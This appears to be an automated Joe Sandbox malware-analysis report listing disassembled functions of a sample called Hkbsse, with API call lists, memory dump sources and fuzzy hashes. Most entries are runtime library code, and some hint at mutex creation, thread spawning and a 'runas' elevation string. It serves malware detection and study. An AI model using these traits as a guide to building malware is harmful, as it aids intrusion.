                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction ID: af48699c100b34bee2eea396ddf61153eca23784d7c583d1e67b1dc7e68ad36d
                    • Opcode Fuzzy Hash: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction Fuzzy Hash: 5E21C332A01764ABDF318E64AC45B9B3758DB01769F244122E986A7791E630FD0186F5
                    Function 044A5219 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 044A5278
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044A529B
                    • __EH_prolog3.LIBCMT ref: 044A52B6
                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 044A52DD
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CacheConcurrency::details::GroupLocalSchedule$H_prolog3Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 2642201467-0
                    • Opcode ID: dcb6518a219445a902490e620ad7a0acbd17b34d3e18e9501e74e8f351b44a97
                    • Instruction ID: 77085ea5829f75a300bb8061d9c6f0efa4f917a9be86d5fc4a1fb447e21fa986
                    • Opcode Fuzzy Hash: dcb6518a219445a902490e620ad7a0acbd17b34d3e18e9501e74e8f351b44a97
                    • Instruction Fuzzy Hash: FB21BC35A00204EFDF14EF99C980AADB7A5BF58318F10402BE5069B291CB71BE11CB51
                    Function 00431440 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 004314D4
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431485
                      • Part of subcall function 0042842B: SafeRWList.LIBCONCRT ref: 0042843C
                    • SafeRWList.LIBCONCRT ref: 004314CA
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 004314EA
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 336577199-0
                    • Opcode ID: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction ID: 32539ca2320707ce92c09178d01679dab9e49ab6512ed056795bb6ab421abb97
                    • Opcode Fuzzy Hash: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction Fuzzy Hash: EC21F53160020EDFC704DF24C880EA5FBA9FB98318F54E2ABD4054B152DB39E99ACB94
                    Function 044B16A7 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 044B173B
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 044B16EC
                      • Part of subcall function 044A8692: SafeRWList.LIBCONCRT ref: 044A86A3
                    • SafeRWList.LIBCONCRT ref: 044B1731
                    • Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 044B1751
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 336577199-0
                    • Opcode ID: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction ID: eb2c4861ed263411e3ee2acce07d984738524a24f9833e2a6fad4252869c5e7e
                    • Opcode Fuzzy Hash: 18e975a48efa1344399c822bb128d39c4957d69b814f3f6e6406d807d4ec682a
                    • Instruction Fuzzy Hash: 3921A17160020A9BDB04DF24C890EA5FBE9FB84258F14D2ABD4054B242E731F99ACBD0
                    Function 044B632E Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction ID: e6a7898286a1be447bf8acee699c1bfb8ba658b674e85a6154236f9f7398ed47
                    • Opcode Fuzzy Hash: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction Fuzzy Hash: E5110B31A02324ABDF314F649C44A9F37589F01760F161127E896A7391EF70FD0286F6
                    Function 0041F3FD Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041F41F
                      • Part of subcall function 0041F5DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425596
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0041F440
                      • Part of subcall function 004202C2: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004202DE
                    • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0041F45C
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0041F463
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                    • String ID:
                    • API String ID: 1684785560-0
                    • Opcode ID: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction ID: c143f49b80a8edc336b5adb3e2ea19dd9ba997e834122e1f90eeb7ad8e6c388c
                    • Opcode Fuzzy Hash: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction Fuzzy Hash: 3B018E71900305BBD7207F6ACC819DBBBA8DF20358B10893FF85492142D778998A87AD
                    Function 0449F664 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0449F686
                      • Part of subcall function 0449F842: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 044A57FD
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0449F6A7
                      • Part of subcall function 044A0529: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 044A0545
                    • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0449F6C3
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0449F6CA
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                    • String ID:
                    • API String ID: 1684785560-0
                    • Opcode ID: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction ID: 4a1c5eb9cb96cbb66880b058e080efde8755d9d624b3b9afd41223599d1500ba
                    • Opcode Fuzzy Hash: de37ef8548d7ff2425975f26c8540d16b97df320fc27a0a145ef4d2f0385f2a7
                    • Instruction Fuzzy Hash: AF01D6725003057FEF20BF5A8C8099BBFE8DF25358B10453FA855D2292D770BD4A97A5
                    Function 004334CF Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004334E9
                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004334FD
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00433515
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043352D
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                    • String ID:
                    • API String ID: 78362717-0
                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction ID: b333cc5f23de22d3145c9e3758e484d235afa0bb9630b9fa484c080b45391314
                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction Fuzzy Hash: CF012636700514B7CF16EE5AC842EAF77A99F58364F00001BFC12EB382DA75EE01C2A5
                    Function 044B3736 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044B3750
                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 044B3764
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 044B377C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044B3794
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                    • String ID:
                    • API String ID: 78362717-0
                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction ID: 1b3baa19196436d146281e5aba4025cb5f66fcbc23a7c32b8d4aef97c82383e1
                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction Fuzzy Hash: AD012672700114B7DF25AE9B8840AEFB7A9AF44254F00401BEC95EB381D930FD1196F0
                    Function 0043B7EC Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,0043B951,00000000,?,0044204B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0043B802
                    • GetLastError.KERNEL32(?,0044204B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B951,00000000,00000104,?), ref: 0043B80C
                    • __dosmaperr.LIBCMT ref: 0043B813
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction ID: eea697dc5ee5a63e9bb000b8ca0ecb04d52ee882e46ab181b6f30ec3310184b0
                    • Opcode Fuzzy Hash: 3cb03c1224146c58c06f7f86378dba41269a8bd7ae4eb61ccf8b67197a59bbf4
                    • Instruction Fuzzy Hash: E4F08132600615BB8B252FA2DC08E5BBF6DFF483A0B109526F61CC7520D735E861CBD8
                    Function 0043B855 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,0043B951,00000000,?,00441FD6,00000000,00000000,0043B951,?,?,00000000,00000000,00000001), ref: 0043B86B
                    • GetLastError.KERNEL32(?,00441FD6,00000000,00000000,0043B951,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B951,00000000,00000104), ref: 0043B875
                    • __dosmaperr.LIBCMT ref: 0043B87C
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction ID: 1fe541eff6bd0899817d30d0916f77e4946d01b6b56965e1649de8632fa44e19
                    • Opcode Fuzzy Hash: 1c4d122a44d644f0ad1f63a0f385b8a873575328d9b4e1f6675adc0812a1f3d5
                    • Instruction Fuzzy Hash: 44F08631600615BBDB256FB6DC04A47BF6DFF483A1B005526F618D7520D739E851C7D8
                    Function 00425115 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00420076: TlsGetValue.KERNEL32(?,?,0041F5F7,0041F424,?,?), ref: 0042007C
                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0042513F
                      • Part of subcall function 0042E41F: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042E446
                      • Part of subcall function 0042E41F: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042E45F
                      • Part of subcall function 0042E41F: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E4D5
                      • Part of subcall function 0042E41F: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E4DD
                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 0042514D
                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00425157
                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00425161
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
                    • String ID:
                    • API String ID: 2616382602-0
                    • Opcode ID: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction ID: 3766eabf401ff52a77b5129f6dfad517b3767f028463115b44bbc9b501536ea0
                    • Opcode Fuzzy Hash: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction Fuzzy Hash: E4F0F635B0093427CA25B667B812D6EB7659F90B14B84012FF51153292DF7C9E15C7CD
                    Function 044A537C Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 044A02DD: TlsGetValue.KERNEL32(?,?,0449F85E,0449F68B,?,?), ref: 044A02E3
                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 044A53A6
                      • Part of subcall function 044AE686: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 044AE6AD
                      • Part of subcall function 044AE686: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 044AE6C6
                      • Part of subcall function 044AE686: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 044AE73C
                      • Part of subcall function 044AE686: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 044AE744
                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 044A53B4
                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 044A53BE
                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 044A53C8
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
                    • String ID:
                    • API String ID: 2616382602-0
                    • Opcode ID: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction ID: a0b26b17d1de3ee09791b20b72521736b11abd056e58a67a50a28c9d68fef60e
                    • Opcode Fuzzy Hash: 935f95a8d328cb7e17ad73e666d247f97af5b027fc0f75f92dedba51ab608920
                    • Instruction Fuzzy Hash: 00F0F671A00518B7EF25B727881096EF769DFB0618B84012FE81193291EFB4BE35C7C2
                    Function 00416D80 Relevance: 6.0, APIs: 4, Instructions: 37threadsleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004099D0: Sleep.KERNELBASE(00000064), ref: 0040A933
                      • Part of subcall function 004099D0: CreateMutexA.KERNELBASE(00000000,00000000,00463224), ref: 0040A951
                      • Part of subcall function 004099D0: GetLastError.KERNEL32 ref: 0040A959
                      • Part of subcall function 004099D0: GetLastError.KERNEL32 ref: 0040A96A
                      • Part of subcall function 00405BC0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040612D
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016B80,00000000,00000000,00000000), ref: 00416D46
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016C10,00000000,00000000,00000000), ref: 00416D57
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016CA0,00000000,00000000,00000000), ref: 00416D68
                    • Sleep.KERNEL32(00007530), ref: 00416D75
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$Thread$ErrorLastSleep$MutexOpen
                    • String ID:
                    • API String ID: 3966068485-0
                    • Opcode ID: f5d0eeff358944ea3866414c35db1e035878ca345e6e00d6db8bbff552f4029d
                    • Instruction ID: 31902ad575a48c38801987c82ff2dd8d9c076a2f2ea5494020ecf42ec81d45e6
                    • Opcode Fuzzy Hash: f5d0eeff358944ea3866414c35db1e035878ca345e6e00d6db8bbff552f4029d
                    • Instruction Fuzzy Hash: C6F0C975BD471475F13032A62C03F9A29145B04F65F320527B7587E1D299DCB4818AEF
                    Function 00429620 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00429629
                      • Part of subcall function 0041F5DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425596
                    • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0042964D
                    • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00429660
                    • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00429669
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                    • String ID:
                    • API String ID: 218105897-0
                    • Opcode ID: 4b9cacacb2642105106c1960082ff98311365aed8213a72dc6553885aca439e3
                    • Instruction ID: 93f89da88a0149968f4bc4dad75d0c9ef1f1bc6a703f7e560df40d29a4a9f6d4
                    • Opcode Fuzzy Hash: 4b9cacacb2642105106c1960082ff98311365aed8213a72dc6553885aca439e3
                    • Instruction Fuzzy Hash: A5F0A070300A305EE661AA26A812F6E23D99F44758F40881FE45B87282CE2CEC43CB5D
                    Function 00446B6F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • WriteConsoleW.KERNEL32(00408770,0000000F,0045FBB0,00000000,00408770,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770), ref: 00446B86
                    • GetLastError.KERNEL32(?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000,00408770,?,0044068B,00408770), ref: 00446B92
                      • Part of subcall function 00446B58: CloseHandle.KERNEL32(FFFFFFFE,00446BA2,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000,00408770), ref: 00446B68
                    • ___initconout.LIBCMT ref: 00446BA2
                      • Part of subcall function 00446B1A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00446B49,00445247,00408770,?,00440137,00000000,?,00408770,00000000), ref: 00446B2D
                    • WriteConsoleW.KERNEL32(00408770,0000000F,0045FBB0,00000000,?,0044525A,00408770,00000001,00408770,00408770,?,00440137,00000000,?,00408770,00000000), ref: 00446BB7
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction ID: 62f88e2b5bb4a89209554c6b3be65d4fc596e2bd3b8c6ec97840f3fc23b8838f
                    • Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction Fuzzy Hash: 7BF03736101274BBDF521F95DC0898A3F2AFB457A1F014062FD1CC5131D672DD209B99
                    Function 044C6DD6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • WriteConsoleW.KERNEL32(044889D7,0000000F,0045FBB0,00000000,044889D7,?,044C54C1,044889D7,00000001,044889D7,044889D7,?,044C039E,00000000,?,044889D7), ref: 044C6DED
                    • GetLastError.KERNEL32(?,044C54C1,044889D7,00000001,044889D7,044889D7,?,044C039E,00000000,?,044889D7,00000000,044889D7,?,044C08F2,044889D7), ref: 044C6DF9
                      • Part of subcall function 044C6DBF: CloseHandle.KERNEL32(00462970,044C6E09,?,044C54C1,044889D7,00000001,044889D7,044889D7,?,044C039E,00000000,?,044889D7,00000000,044889D7), ref: 044C6DCF
                    • ___initconout.LIBCMT ref: 044C6E09
                      • Part of subcall function 044C6D81: CreateFileW.KERNEL32(00457658,40000000,00000003,00000000,00000003,00000000,00000000,044C6DB0,044C54AE,044889D7,?,044C039E,00000000,?,044889D7,00000000), ref: 044C6D94
                    • WriteConsoleW.KERNEL32(044889D7,0000000F,0045FBB0,00000000,?,044C54C1,044889D7,00000001,044889D7,044889D7,?,044C039E,00000000,?,044889D7,00000000), ref: 044C6E1E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction ID: 3903a9de23ec4b8858c95e7d559f180de9cf867042ab09dc708b11ede14e8040
                    • Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction Fuzzy Hash: 67F01C3A501214BBDFA21FA5EC0899A3F26EB483A1F058126FA1C85121D672D820DB95
                    Function 0041D2A9 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    • SleepConditionVariableCS.KERNELBASE(?,0041D246,00000064), ref: 0041D2CC
                    • LeaveCriticalSection.KERNEL32(00465720,00468650,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2D6
                    • WaitForSingleObjectEx.KERNEL32(00468650,00000000,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2E7
                    • EnterCriticalSection.KERNEL32(00465720,?,0041D246,00000064,?,76230F00,?,0040765D,00468650), ref: 0041D2EE
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                    • String ID:
                    • API String ID: 3269011525-0
                    • Opcode ID: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction ID: 1ac50c9b0066e0c4a2d53f3e21af84157b5af11804174151a578e244d4ee8ebf
                    • Opcode Fuzzy Hash: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction Fuzzy Hash: 6DE0ED35541B24E7CB112B94AC08A8E3B18EB09753F144072F9059656196B598419BDE
                    Function 00407820 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468sleepCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: runas
                    • API String ID: 3472027048-4000483414
                    • Opcode ID: 3d76a9baea452867510f7c81a089139e7bb2d27326516a2e7019a00988786ba5
                    • Instruction ID: 9d19d4fe5d809e0f9ff9941f70a6e5c2266b8a13b716b69cce3286adae415981
                    • Opcode Fuzzy Hash: 3d76a9baea452867510f7c81a089139e7bb2d27326516a2e7019a00988786ba5
